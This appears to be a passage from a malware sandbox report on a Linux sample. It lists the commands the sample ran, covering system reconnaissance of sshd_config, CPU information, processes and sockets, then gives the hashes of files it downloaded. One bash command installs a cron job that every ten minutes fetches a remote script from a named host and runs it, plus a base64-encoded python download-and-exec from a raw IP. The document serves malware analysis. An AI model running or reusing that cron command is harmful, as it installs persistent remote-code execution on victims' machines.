/usr/bin/catcat /etc/ssh/sshd_config1⤵
-
/usr/bin/sedsed -e "s/\$//"1⤵
-
/usr/bin/sedsed -e "s/^ *//"1⤵
-
/usr/bin/cutcut -d: -f21⤵
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/usr/bin/awkawk "{print \$4}"1⤵
-
/usr/bin/awkawk "{print \$4}"1⤵
-
/usr/bin/wcwc -l1⤵
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"1⤵
-
/usr/bin/grepgrep -- "-bash[[:space:]]*\$"1⤵
-
/usr/bin/grepgrep -v grep1⤵
-
/usr/bin/psps aux1⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/ssss -ant1⤵
-
/usr/bin/ssss -ant1⤵
-
/usr/bin/ssss -ant1⤵
-
/usr/bin/bashbash -c "echo '*/10 * * * * (curl -s http://dw.c4kdeliver.top:443/2.gif || wget -q -O - http://dw.c4kdeliver.top:443/2.gif || lwp-download http://dw.c4kdeliver.top:443/2.gif /tmp/2.gif) | bash -sh; bash /tmp/2.gif; rm -rf /tmp/2.gif; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDY6NDQzL2QucHkiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash' | crontab -"1⤵
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
182B
MD54847d0ba37990c8b3e81b82600e3759f
SHA125efb8e596a1cbcc0131b7ed85482b6c86e3fbd0
SHA2568f56f290451bc9a85fbcc7bd6cb605973ebb12412920d050d8be0d4666c8f73f
SHA512899ab30f716baf622cbc2d1c5dafd6a955df2583ec844bc7480257ee0eae0eef94564bd79c17f565d2d3c46a8697bcf7dea90fc03be1b1da2574a70635e93ed3
-
Filesize
179B
MD57085dc81c0f71aa007f9aa2753f33562
SHA15ebe6f7d0093ff39eb9bb1c5531b996ad89954c2
SHA25626e311de204b3727c0d0a282ca88d34e02e9e3b33f7f164a890152cc2ecdd9d7
SHA512cdbe6288a734b1cf0b8a36d7a093eddf74d9298beb1c24cf18d7182fbbbfc7b1e0cf11a69dd30694e7f156bb94f9916d78c646b7127141803db6288f5568350b
-
Filesize
334B
MD55bdb87c18d322065c21c2b64511e8c9a
SHA195805bfe6a2acd6c93e7d2872276bb47b66ebb47
SHA25645c90566fe2215656c7d2dd32cb216e276bbaf0f3992a92014dbf3a61113dc62
SHA512290a7c8f5a62a713fe980cae9f459198db93e04ed0f0162c06b9d4645cfbb85765172b9cc34a56ff607dd1ed4c0a217cd22781058d2f0ac73e2f057f60a3ec6a
-
Filesize
367B
MD57240970d2eaf113cbd0f8b3d638f3030
SHA16f2fe902906eeae017a2d219d1fe212250e7eda0
SHA25690d6f965fe33845035f5da674560a043f9cfbb992c715394a63c38bc96c11d75
SHA5129a0d03e573b37746b719fd4bcf69be12e46798ebfff72b3cdd7e9ff367a6d89bdebaa128b61d3a5536495cd962fd670fe6d782610b04ed1e208598a9a606d9d7
-
Filesize
364B
MD5c05ea7b436c52279a74eea5fc066a6c4
SHA1ee6d10909a422d536d4f501865c3ac924f7ffded
SHA256e81798f161ea7ff564203e9ab48a00f0e26b4f8c3fd43f18f187870b16f44e40
SHA512163e1cb3751b4e5561e8c6c6f85a7dafe3ae7fbcf79b814ab8255788810549b997999f0d1758f70481c28863133ccadf9b172f37e20a1c0d0bdefe17f3fc30f1
-
Filesize
359B
MD5ca72b64121de5e1f38dc84abbdeb6866
SHA1416e2b1567af3cfb1d7747fbd57932c67c771b37
SHA256fac4fd7d3c86c91f2111ca93704d45e066e8a8f4dc878a6637849db0e0b4b1f9
SHA5126fb2a33111f711c5bc8b171e4c6e39b57e7ae8d1e2da10775fbf0ea3d1279d8b9b327cd5ec4c5c51fe84adc3070490051fe5b9be0f6f38934a372b19f9b20f64
-
Filesize
4B
MD5daa96d9681a21445772454cbddf0cac1
SHA19d3e25533e3322d6248f322cc879f8307421807f
SHA256e56ae9ee21661d3febabe8d1e03ee82d02466a5d405e89f2acf449cd6a6240b8
SHA51284c0b8bc2cc09ace8a73ccee6fe77b9448a344e625c40205cc8dcc96ed505ffc85e78e8b35699bf4e411762d3630ad09c5b737c1ae447aa7eeb9a3e16ed479cb
-
Filesize
184KB
MD563a86932a5bad5da32ebd1689aa814b3
SHA1472548a4b8295182f6ba8641d74725c2250b7243
SHA2560013b356966c3d693b253cdf00c7fdf698890c9b75605be07128cac446904ad9
SHA5124631e014f77c683819ae34278625b21525d9fa0697e5376ff2babfd77af3ca609fb4a82cde2374f2c96b00dc52cdc34d7efdc40a7ee2609566a6b6e9e630f332
-
Filesize
2.2MB
MD5a41fc4602da0bdd428ef07ad45c98fd4
SHA1d8b68e02354e030ef99e412d510eaa7038b6a44a
SHA25604ac6c57ff25b4c2ccaae3f8fab20a0c9d45e4f51298f14e84fa8b2ab21f3583
SHA512c6b5c2ad7171867465a68d7b55d88d5f6005e34c4c017035b0b1a9efe13fd240bbc0a47f37caa5e7f48849edd812b26c3336968f5871b3142982a360f0f85c7b
-
Filesize
2.3MB
MD5915aec68a5b53aa7681a461a122594d9
SHA138be55f1fc4ce1cb5438236abc5077019e5e1cdf
SHA256e2c3e81aa24b20ac71147340adc1eaedf077ad00e4a2359e3db47b166cf5411a
SHA512668369810060738e38bc7ed2ad4ff4fbeb8bc99fb46e080423972982b486b5e5e6bab6fc73ede0ee2e5638c8f5fcb1e8ea764a7b6bfb9c6086f238ec5cade8d0
-
Filesize
371B
MD510dc79941de4d72c5353f28974f31c92
SHA132792bf77863ef0a3572cef7aee83da17fbaf3a4
SHA256dee46bab77e9dc26abb4062c6df75d05feb19034754908832271215045b2de5a
SHA512f76c957c2cbdace6310237668863614f3012abeeb02e1298e01961fbeb030c3a109dea561dab3ff719b49670e73c4ab95a0cf0ee9b89e521c54410d45f5efff1
-
Filesize
368B
MD5ba411ff974701246bd51184dc62dff03
SHA1fde92553185f2f3e17be8500a02deeebdff5344f
SHA256a0d7d55b25cefb4ea12b474532bee974916052fae36ccb30657d78b21004e1fa
SHA51202463506f02c3bc5d06439b033b1c01c977414ab8b3eb4eb5b306b6a098f61cbdced3101b17afbb9d484fd93d37d4502f4c4270f17e5d7c61de2db532c7d17bc
-
Filesize
655B
MD57be2bfe8342905041d04fe76dbd711be
SHA1c7f0e9391c0536fa36012dec1985289731f68470
SHA256e46550155d32bb06fb87bea2a734ae124ec68dc90251c1d1242b95927ab3fd5f
SHA5120ea452439761d3bd942b016dd75b41c2106573a1e9faeffb2283b44f9e25093a040a4f88f9f4b21f9fb25222104321b77b9d532af06ef9896f29265fd50dd64e
-
Filesize
655B
MD54e7540e38858367ded1b7d920d30fd85
SHA1cdd30ba064695bc210c00e023c8864909d8d3736
SHA256f0e26c566f1bb7b84b14b525ba0a6c8cfa1c3fa91d13e59172e2713989e4f7fa
SHA51210cf3635f092e4e808deab4e25e7003f400e701d20ee90053a3339210f3122e6473507bca9cc5e922643b8394835edebabdaa03ef1b4e661b479cdeea76fac99
-
Filesize
655B
MD5bed4a04ba73319d9187b8587c33e8d32
SHA164b99aa433eb2131547880ac8a43c98b82b23e55
SHA256c54c732fa4f8ac1738e096b431c3db2c15cf643891f3fa00daf99ad8168831e5
SHA51268238cba6a5baf59bedc0294be2bd5eede91b5dfae1eaf633ca4c3d51afbe3d2d1d068552771bd74e1f749b4885033f453200bf130303faa0ea0c407d7c2ca15
-
Filesize
655B
MD5f8542d4282954e13cac3424f4fbab8bc
SHA1c5a911aed9984dcce74c1961a2123010e2b4d27b
SHA2567f4d0006d6dc133363b7c9b852fcf167187833f05cf4b531a2fb7d0091e62652
SHA512c99d61d6ab905903304b94de2cbc10b7311ccfc2ce4fb97a3ae6f9149446d32d31b97fd365ac8d1e7f2cbf40ac5675b63a3b90c876064f52cdba2d8d7cc2706a
-
Filesize
653B
MD5cf72fe3551fd0298138d5788723aa040
SHA163a77735fb91cb5bfbf8d899aa0ed2531e7f86af
SHA2565f26a13fe3db51b85e1d8df9f701b40f3dd71bd129483cc6485c2e1bd22568c9
SHA51230dbc4ea49906ec438ed53d37a66429627d9a60a6b0a8ae95eeef59a6038e77a3dde3463c5c1d64ce816246044d1797011b339c7190a6b9070611b558343b151